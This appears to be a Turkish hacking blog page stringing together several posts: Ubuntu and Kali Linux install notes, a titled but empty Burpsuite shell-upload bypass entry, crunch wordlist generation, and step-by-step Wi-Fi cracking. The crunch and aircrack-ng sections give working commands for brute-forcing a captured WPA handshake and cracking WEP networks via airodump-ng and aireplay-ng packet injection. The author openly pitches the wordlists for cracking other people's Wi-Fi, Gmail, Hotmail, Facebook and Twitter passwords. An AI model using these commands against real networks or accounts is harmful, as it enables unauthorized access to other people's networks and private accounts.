Kali Linux Burpsuite Shell Upload Bypass

Selamun Aleyküm ..

Kali Linux 2017.1 Burpsuite (Professional) Shell Upload Bypass





Fan Sesi İçin Kusura Bakmayın :)

Ubuntu Kurulumu Resimli Anlatım

Ubuntu, Linux tabanlı özgür ve ücretsiz bir işletim sistemidir. Ubuntu projesi, Linux ve özgür yazılımın, bilgisayar kullanıcılarının günlük yaşamının bir parçası haline gelmesi amacıyla başlatılmış olup ilk kararlı sürümü Ekim 2004'te yayınlanmıştır. Ubuntu günümüzde 20 milyonu  aşkın kullanıcısıyla dünyanın en yaygın masaüstü Linux dağıtımı konumundadır.
Ubuntu, herkesin özgürce kullanabildiği; yayınlamakta, kopyalamakta ve kodlarını değiştirip geliştirebilmekte özgür olduğu yazılımlardan oluşur. Bunların çoğunluğu GNU Genel Kamu Lisansı ile güvence altına alınmış, özgür yazılım / açık kaynak yazılımlardır.

Gerekli Programımız Wmware Workstation: Link













                                                                             
                                                                             

Ayarlarda Language Support Kısmından Türkçeyi Seçebilirsiniz Biraz Aceleye Geldi Faydalı Olması Dileğiyle.

Wordlist Hazirlama / Kali Linux

Bügün Sizlere Kali Linux Üzerinde Wordlist Hazirlamayi Göstericem Neden Derseniz Wordlist Bulmak Her Zaman Sıkıntı Crunch Sayesinde En Güncel Wordlistinizi Oluşturabilirsiniz. Windows İçinde Wordlist Hazirlama Programlari Mevcut Ancak Güncel Değil Yada Bizim İstediğimiz Gibi Bi Wordlist Hazirlayamamaktadir(Benim Görüşüm) O Yüzden Crunch Bizim İçin Önemlidir Kombinasyon Üzerine Yapildiği İçin Her Türlü Olasılığı Üretmektedir. 1. Terminal açip "crunch" Komutunu Yaziyoruz.  
2. Ben En az 4 Ve En Fazla 6 Karakteri Geçmeyecek Şifreler İstiyorum "rezart64" Bu Harf Ve Sayilardan Bana Olabilecek Her Türlü Olasılığı Oluşturacak. Ama Başta Girdiğimiz 4 ve 6 Haneden Oluşturacak Bu Size Kalmiş Bu Değerleri Değiştirebilirsiniz Atiyorum En Az 8 En Fazla 12 Harfli ve Rakamli Wordlist Oluşturmak İstiyorsunuz Bunun İçin Yapmanız Gereken " crunch 8 12 trazer123456 -o /root/Desktop/şifre.txt " Şeklinde Olucaktir. Buradaki " -o /root/Desktop/şifre.txt" İşlemi İse Oluşacak Txt Dosyasinin Nereye Hangi İsimde Kaydedileceğini Soruyor. Masa Üstüne Şifre.txt Adiyla Kaydedilmesini İstedik.  

Burada Bize "rezart64" Değerinden 136857 Adet Şifre Oluşturduğunu Söyledi (:, 3. Oluşan Şifreler.txt Belgemize Bakalim Gördüğünüz Gibi Masa Üstünde. İçindeki Oluşan Şifrelere Göz Atalim Gördüğünüz Gibi Trazer'i de Üretmiş Bulunmakta .

 

4. Diyebilirsinizki : İyi Güzel Anlatmişsinda Nerden Kullanicaz Bu Oluşan Wordlisti Yada Ne İşimize Yaricak ? (: Wordlist Bize Her Zaman Lazım Brute Force Yaparken Bu Wordlist Sayesinde Wireless, Hotmail, Gmail, Facebook, Twitter Kullanicilarin Şifrelerini Oluşturduğumuz Wordlist Sayesinde Kirabiliriz. (:

Sızma Testlerinde Özelleştirilmiş Crunch Wordlist Dosyası  Charset.lst Dosyasının Icınde Bulunmaktadır.




                                


  • CHARSET.LST Dosyasımızın İçi Bu Şekildedir


# charset configuration file for winrtgen v1.2 by Massimiliano Montoro (mao@oxid.it)
# compatible with rainbowcrack 1.1 and later by Zhu Shuanglei <shuanglei@hotmail.com>


hex-lower                     = [0123456789abcdef]
hex-upper                     = [0123456789ABCDEF]

numeric                       = [0123456789]
numeric-space                 = [0123456789 ]

symbols14                     = [!@#$%^&*()-_+=]
symbols14-space               = [!@#$%^&*()-_+= ]

symbols-all                   = [!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
symbols-all-space             = [!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]

ualpha                        = [ABCDEFGHIJKLMNOPQRSTUVWXYZ]
ualpha-space                  = [ABCDEFGHIJKLMNOPQRSTUVWXYZ ]
ualpha-numeric                = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
ualpha-numeric-space          = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ]
ualpha-numeric-symbol14  = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=]
ualpha-numeric-symbol14-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+= ]

ualpha-numeric-all  = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
ualpha-numeric-all-space      = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]

lalpha                        = [abcdefghijklmnopqrstuvwxyz]
lalpha-space                  = [abcdefghijklmnopqrstuvwxyz ]
lalpha-numeric                = [abcdefghijklmnopqrstuvwxyz0123456789]
lalpha-numeric-space          = [abcdefghijklmnopqrstuvwxyz0123456789 ]
lalpha-numeric-symbol14       = [abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=]
lalpha-numeric-symbol14-space = [abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+= ]
lalpha-numeric-all      = [abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
lalpha-numeric-all-space      = [abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]

mixalpha                   = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ]
mixalpha-space             = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ ]
mixalpha-numeric           = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
mixalpha-numeric-space     = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ]
mixalpha-numeric-symbol14  = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=]
mixalpha-numeric-symbol14-space = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+= ]
mixalpha-numeric-all       = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
mixalpha-numeric-all-space = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]

#########################################################################################
#                 SWEDISH CHAR-SUPPORT                                                  # #########################################################################################

#########################
# Uppercase             #
#########################
ualpha-sv                        = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ]
ualpha-space-sv                  = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ ]
ualpha-numeric-sv                = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789]
ualpha-numeric-space-sv          = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789 ]
ualpha-numeric-symbol14-sv       = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+=]
ualpha-numeric-symbol14-space-sv = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+= ]
ualpha-numeric-all-sv            = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
ualpha-numeric-all-space-sv      = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]

#########################
# Lowercase             #
#########################
lalpha-sv                        = [abcdefghijklmnopqrstuvwxyzåäö]
lalpha-space-sv                  = [abcdefghijklmnopqrstuvwxyzåäö ]
lalpha-numeric-sv                = [abcdefghijklmnopqrstuvwxyzåäö0123456789]
lalpha-numeric-space-sv          = [abcdefghijklmnopqrstuvwxyzåäö0123456789 ]
lalpha-numeric-symbol14-sv       = [abcdefghijklmnopqrstuvwxyzåäö0123456789!@#$%^&*()-_+=]
lalpha-numeric-symbol14-space-sv = [abcdefghijklmnopqrstuvwxyzåäö0123456789!@#$%^&*()-_+= ]
lalpha-numeric-all-sv            = [abcdefghijklmnopqrstuvwxyzåäö0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
lalpha-numeric-all-space-sv      = [abcdefghijklmnopqrstuvwxyzåäö0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]

#########################
# Mixcase               #
#########################
mixalpha-sv                   = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ]
mixalpha-space-sv             = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ ]
mixalpha-numeric-sv           = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789]
mixalpha-numeric-space-sv     = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789 ]
mixalpha-numeric-symbol14-sv  = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+=]
mixalpha-numeric-symbol14-space-sv = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+= ]
mixalpha-numeric-all-sv       = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
mixalpha-numeric-all-space-sv = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]


Örnek Olarak Gösteriyim. Bitane  Handshake Yakaladıgım Bir Cap Dosyası, War Bu Cap Dosyasını Wordlist Olusturmadan, Yanı Wordlisti Bılgısayara Kayıt Etmeden Olusan Wordlistleri Aircrak İle Denemesini Sağlayağım,






Örnek Komut : root@trazer:/usr/share/crunch# crunch 8 10 -f charset.lst ualpha  | aircrack-ng -b 18:28:61:3F:69:0F /root/Desktop/super.cap -w-

 Yukarıdakı Resımde Gösterdigim Gibi Crunch Klasorunun İçinde Vermelisiniz Komutu Yoksa Calısmaz Alltaki Resimde Dogru Ancak Eksık Komut Girilmiş Üsteki Resimdeki Gibi /usr/share/crunch# Klasorunde Calıstırmalıısınız Komutu.

Resimde Yanlıs Yerde Yanlıs Komut Kullanmısım Charset Kullanabılmemız İçin O Dizinde Yazmalıyız Komutumuzu, Aldırmayın Dogrusu Üsteki Resimdeki Gibidir.. 




Diyecek Olursak CRUNCH ile en az 8 en fazla 10 harften oluşacak sekılde sıfre olusturmasını ıstedık. bu sıfreler neden olusacak dedi ve bizde ualpha    = [ABCDEFGHIJKLMNOPQRSTUVWXYZ] 'dan Olusacağını Belirttik Ardından aircrak'a bssid'imizi verdik sonra yakaladıgımız handshake (cap) dosyasının yolunu gösterdik ve ualphadan olusacak sıfrelerı aynı pencerede aircrack ıle cap dosyasının uzerinde denemeye basladı. Buldugunda Şifreyi Bize Key Found Olarak Göstericek. Umarım Anlatabilmişimdir.




Wireless Şifre Kirmak Wifi Hack Resimli Anlatim

Meraba Arkadaşlar Bugün Size WEB Wifi Hack'i Kendimce Anlatmaya Çalıştim Biraz Aceleye Geldi İdare Edin (: Faydali Olmasi Dileğiyle ... Bu KONUMUZDA Sizlere Wmware Work Station 10 Üzerinde Kali Linux Kurulumundan Bahsetmiştim. Şimdi İse Kali Linuxta Şifreleme Türü WEB Olan Ağların Nasıl Şifrelerinin Elde Edilebileceğini Anlatıcam. Tabikide Bilgi Amaçlıdır. 


Videolu Anlatım : 



Resimli Anlatım:  
  1.komut :" iwconfig"


2.komut:"ifconfig"wlan0 HWaddr:00:25:22:4c:50:17 yazan bölüm bizim MAC adresimiz.

 

3.Komut:"airmon-ng start wlan0" Bu Komut İle Ağ Kartimizi Aktif Hale Getiriyoruz. (Monitor Mode Enabled on mon0)

 

4.Komut :"airodump-ng mon0"Komutu İLe Çevremizdeki Wifi Ağlarin Essid (İSMİ) BSSİD (Mac Adresi) CH (Yayin Yaptiği Kanal Numarasi)ni görebiliriz. Buradan Kendimize Şifreleme Türü WEB Olan Bi Hedef Seçiyoruz Hedefimizin Mac (BSSİD) CH(Kanal NO) Aliyoruz notepad dosyasına kaydediyoruz. (Ben Guvenlik İçin Bssid Ve Essid'i Gizledim.)

 

5.Komut:"airodump-ng -c 6 --bssid 00:00:XX:XX:XX:XX hedef mac --ivs -w deneme mon0"yada hedef modem ismini yaz mon0 enter.Burdaki -c Hedefin yayin yaptiği kanal numarasi. örn: "airodump-ng -c 6 --bssid 11:22:33:23:83:44 --ivs -w wifihack mon0" burdaki "wifihack" yazisi toplayacak olan paket dosyamizin adi "wifihack" bu dosyada başlangıç klasorüne kayit edilecek otomatik olarak.

 

6.Komut:Trafik Oluşturma. "aireplay-ng -1 2 -o 10 -q 10 -a hedef mac adresini yaz buraya -h kendi mac adresini buraya yaz mon0" Örn:aireplay-ng -1 2 -o 10 -q 10 -a 00:00:XX:XX:XX:XX -h 00:25:22:4c:50:17 mon0"

 

7.Komut:Yeni Bir Konsol Açıp Şu Komutlari Yaziyoruz:"aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b hedef mac adresi -h bizim mac adresi mon0" Örn:"aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:00:XX:XX:XX -h 00:25:22:4c:50:17 mon0"

 

8.Komut:Bu Kisimda Yapmamiz Gereken Paket Toplamasini Beklemek Yeteri Kadar Paket Topladiğinda Şifre Kirma İşlemimiz Kisa Sürede Sonuç Verecektir.

 

9.Komut: En Sevdiğim Kısım (: Yeni Bi Terminal Açıyoruz Ve "aircrack-ng -a 1 wifihack-01.ivs" Yaziyoruz Ve Topladiğimiz Paketleri Kirmaya Başlıyoruz. Hatirlarsaniz 5. Komutta Dosya İsmimizi "wifihack" Olarak Belirtmiştik Bu Yüzden 5.Komutta Vericeğiniz İsmi Unutmayiniz Unutursanizda Zaten Başlangıç Klasoründe Olucaktir (:

 

10.Komut: aircrack-ng -a 1 wifihack-01.ivs

 

Ve İşte Kirilan Şifremiz KEY FOUND! [* *: * *: * *: 9 9:9 9:] Aralarindaki : İşaretlerini Silin Ve Bağlanin.. Yakinda Hanshake Yakalayarak WPA WPA2 Hack'i Anlaticağim Takipte Kalin. Yapamayan Hata Alan Yorum Yapsın Yardimci Olalim.
ip adresi

Wmware Workstation (Sanal Pc) Kali Linux Kurulumu Resimli Anlatim

Meraba Arkadaslar Sizlere Wmware Workstation'a Sanal Pc olarak Kali Linux Kurulumu Resimli Olarak Anlaticam Yaklaşık 25 Resimden Oluşuyor En İnce Ayrintisina Kadar Anlattim. Kuruluma Başlamadan Önce Kali Linuxtan Bahsedelim Biraz : Kali Linux’un bugüne kadar en gelişmiş penetrasyon test güvenlik ve kararlılık özelliklerine sahip bir işletim sitemidir. Backtrack yapımcıları tarafından 2013 yılında oluşturulmuş olan bir güvenlik kontrol işletim sistemi. İçerisindeki araçlar sayesinde bir çok alanda (network, windows, arduino) güvenlik testi yapmak ve yazılım geliştirmek mümkün. Masaüstü ortamı olarak Backtrackteki gibi KDE seçeneği yok yalnızca GNOME masasütü ortamı kullanılabilir durumdadır, ayrıca 64bit(amd64), 32 bit(i386),ARM ve armel alt yapı desteği de vardır. KaliLinux Dowloand : www.kali.org/downloads WmwareWorkstation:my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_workstation/11_0 Sanal Pc İle Linux İso Dosyamizi İndirdikten Sonra Kuruluma Başlayabiliriz.